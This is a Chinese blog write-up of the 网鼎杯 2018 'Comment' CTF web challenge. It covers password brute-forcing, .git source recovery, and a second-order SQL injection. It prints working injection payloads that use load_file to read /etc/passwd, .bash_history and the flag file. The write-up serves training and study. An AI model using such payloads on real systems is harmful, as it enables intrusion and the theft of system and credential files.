[网鼎杯 2018]Comment

最新推荐文章于 2024-05-03 12:07:37 发布
最新推荐文章于 2024-05-03 12:07:37 发布
阅读量170 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/118545693
版权

知识点:

  1. 密码爆破
  2. 代码审计
  3. 二次注入
  4. 文件恢复

打开之后是一个发表评论的界面,尝试发表一下,发现需要登录,

登录界面提示密码只缺三位需要爆破,直接通过burp即可爆出密码为zhangwei666

登录

在控制台发现有提示,

应该是git恢复,扫一下后台发现了git文件

使用githacker恢复源码,但是恢复不全,

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

使用

git log --reflog命令查看到一共经过三次提交,我们恢复到第一个版本,

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

完整的源码如下,

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

这里会构成二次注入,addslashes函数会在某些字符前加上反斜线,但数据库存入的数据会自动过滤处理,也就是说数据还是原样保存插入到数据库中,在插入数据库的代码中,所有参数都用这个函数做了处理,但是在下面的代码中,category从数据库中查出来后就没有处理直接拼入了sql中,造成二次注入。

case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;

就可以看到ctf数据库名,然后使用load_file读取文件。

aa',content=(select(load_file('/etc/passwd'))),/*

 

查看使用过的系统命令,

	22r',content=(select(load_file('/home/www/.bash_history'))),/*

可以看到这里删除了.DS_Store

通过十六进制读取.DS_Store

22r',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

16进制转换之后可以看到有一个guanyuflag的php文件

flag_8946e1ff1ee3e40f.php

aa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

解码获取到flag。

Ushernrt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GitHacker::spider_selector:一个Git源泄漏利用工具,可还原整个Git存储库,包括来自存储的数据,用于白盒审核和开发人员的思想分析
02-02
吉特·哈克 描述: This is a multiple threads tool to detect whether a site has git source leaks, and has the ability to download the site source to the local This tool can even be in. Git directory is prohibited when access to the use of loopholes It is worth mentioning that this tool will be, git directory completely simulated to the local rather than tools such as [githack] just simply restore to the latest version so that you can view the developer's submission history as well as submit the
从零开始的Web渗透:信息收集步骤详解
xf555er的博客
04-09 5021
Web渗透测试中的信息收集是一个重要的环节,通常是渗透测试的第一步。信息收集是为了获取目标网站的相关信息,例如IP地址、域名、主机名、服务器类型、Web框架、操作系统、CMS、插件和扩展等。这些信息对于攻击者来说是非常有用的,因为它们可以帮助攻击者了解目标网站的架构和漏洞,从而针对性地进行攻击。 信息收集通常可以通过多种方法实现,例如使用搜索引擎、DNS查询、端口扫描、CMS识别、社会工程学、开源情报收集等。常用的信息收集工具包括Nmap、Shodan、FOFA、Whois、Wappalyzer、What
GitHacker:Git源码泄漏检测工具可恢复整个Git Repo
最新发布
just do it
05-03 521
【代码】GitHacker:Git源码泄漏检测工具可恢复整个Git Repo。
GitHack & GitHacker
z1moq的博客
06-11 4327
写这个的原因是在做CTFHub的Git泄露题目时发现GitHack并不能正常将服务器中的 .git 文件正常保存下来,问了问工作室的好哥哥,告诉我GitHack就是有这个问题,使用GitHacker即可,于是记录下此问题 GitHack 下载地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等web安全漏洞。 G.
GitHacker的安装与使用
m0_74317362的博客
10-21 331
GitHacker的安装与使用
githacker安装详细教程,linux添加环境变量详细教程(见标题三)
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-30 3230
笔者是ctf小白,这两天也是遇到.git泄露的题目,需要工具来解决问题,在下载和使用的过程中也是遇到很多问题,写此篇记录经验,以供学习在本篇标题三中有详细介绍了的操作教程,以供学习。
oracle comment命令用法示例分享
09-10
Oracle的`COMMENT ON`命令是数据库管理系统中用于添加元数据注释的重要工具,它允许数据库管理员或开发人员为表、列、操作符、索引类型、物化视图等对象添加描述性注释。这些注释有助于提高数据库的可读性和可维护性...
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器网关...
powerdesigner,将name自动填充到注释(comment)。
08-10
在数据库建模过程中,为表、字段等对象添加注释(Comment)是十分重要的,因为它有助于增强代码的可读性和维护性。在PowerDesigner中,可以通过执行脚本来自动化一些重复性任务,例如将字段的名称(Name)自动填充到...
PowerDesigner 中name和comment 互换脚本
06-12
提供的两个脚本文件——"comment脚本赋值到PDM的name.vbs"和"name脚本赋值到PDM的comment.vbs",其功能分别是将当前对象的comment属性值赋给name,以及将name属性值赋给comment。这样的操作对于批量处理大量对象的...
mysqldocdump-comment-import-markdown
01-16
linux环境运行根据mysql的comment属性导出markdown格式的数据文档 ./mysqldocdump -u user -p xxxx -h 127.0.0.1 -D dbname -o db.md ./mysqldocdump -h markdown查看工具 推荐Typora
VulnHub靶机渗透实战8-darkhole-2
随心所欲不逾矩
11-22 1348
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:lush@admin.com,密码:321.
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3102
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
[网鼎杯 2018]Comment -----不会编程的崽
不会编程的崽的博客
03-25 1067
网鼎杯 二次注入 Git泄露 弱口令
git泄露工具 githacker安装 + linux把可执行命令添加到环境变量中
ShenZ的博客
09-07 2944
工具地址:https://github.com/WangYihang/GitHacker 1.安装 pip3 install GitHacker 2.将GitHacker可执行命令添加到环境变量 find命令可以发现GitHacker命令在/home/[username]/.local/bin/githacker 以下用户名都以p3代替 (1)创建软连接 cd /usr/sbin //创建软连接放到 /usr/bin 或者 /usr/sbin 目录下 ln -s /home/p3/.local/bi
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 527
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
github上软件的安装步骤
m0_74317362的博客
07-28 1220
1.要在Kali Linux上安装GitHack工具,您可以按照以下步骤操作:cd GitHack3.安装依赖项。确保您的系统已安装Python和pip。4.现在,您可以运行GitHack。这将打开GitHack的主菜单,您可以在其中选择不同的功能和选项来执行各种Git存储库的渗透测试。
sql COMMENT
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值